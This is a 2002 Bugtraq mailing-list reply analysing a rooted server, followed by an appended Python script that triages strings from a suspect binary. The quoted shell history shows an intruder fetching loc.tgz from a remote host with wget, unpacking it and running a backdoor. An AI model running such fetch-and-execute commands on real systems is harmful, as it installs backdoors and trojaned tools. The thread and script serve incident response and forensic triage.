Re: Rooted, .haos on system

From: zeno (bugtraq@cgisecurity.net)
Date: 12/16/02

    From: zeno <bugtraq@cgisecurity.net>
    To: damian@sentex.net (Damian Gerow)
    Date: Mon, 16 Dec 2002 15:54:02 -0500 (EST)
    
    

    > Left in the .bash_history was this:
    >
    > w
    > cd /tmp
    > wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
    > ./epc
    >
    > A quick check tells me that 'epc' is a backdoor utility, and the other
    > file contained within loc.tgz looks like a trojaned 'su'.

    Maybe you should email this dude. He wrote the exploit (or so the exploit says).

    "su exploit by XP <xp@xtreme-power.com>
    Enjoy!
    "

    Other neat stuff if you do a strings on the two filenames.

    >
    > I've already notified Geocities abuse, and haven't heard back from them
    > yet.
    >

    The domain name resolves to http://www.djteckh.com/; maybe worth checking out.


    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
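A small triage script, added here as an example and not part of this thread, that does what zeno suggests: pull the printable strings out of a suspect binary and sort them into the indicators an analyst would chase first (author tags, URLs, filesystem paths). The sample bytes and the example.invalid URL are constructed for the example; the real contents of loc.tgz are not on this page.

```python
from __future__ import annotations
import re

# Constructed stand-in for a suspect binary such as the 'epc' or trojaned 'su'
# from the thread. These bytes are made up for the example, not the real payload.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"su exploit by XP <xp@xtreme-power.com>\x00Enjoy!\n\x00"
    + b"\x01\x02\x03/tmp/loc.tgz\x00\xff\xfe"
    + b"http://www.example.invalid/loc.tgz\x00ab\x00"
    + b"/etc/passwd\x00/bin/sh\x00"
)

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL_RE = re.compile(r"(?:https?://|www\.)[\w./?=&%-]+")
PATH_RE = re.compile(r"(?<![\w/])/(?:tmp|etc|bin|usr|var|dev)(?:/[\w.-]+)+")


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(data: bytes) -> dict[str, list[str]]:
    """Group extracted strings into the indicators worth chasing first.

    An author tag or e-mail address is a claim made by whoever built the
    binary, not proof of who ran it on this box, so it is filed as a claim.
    """
    report: dict[str, list[str]] = {
        "attribution_claims": [], "urls": [], "paths": [], "other": []}
    for s in extract_strings(data):
        if EMAIL_RE.search(s):
            report["attribution_claims"].append(s)
        elif URL_RE.search(s):
            report["urls"].extend(URL_RE.findall(s))
        elif PATH_RE.search(s):
            report["paths"].extend(PATH_RE.findall(s))
        else:
            report["other"].append(s)
    return report


if __name__ == "__main__":
    for kind, items in triage(SAMPLE_BINARY).items():
        print(f"{kind}: {items}")
```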
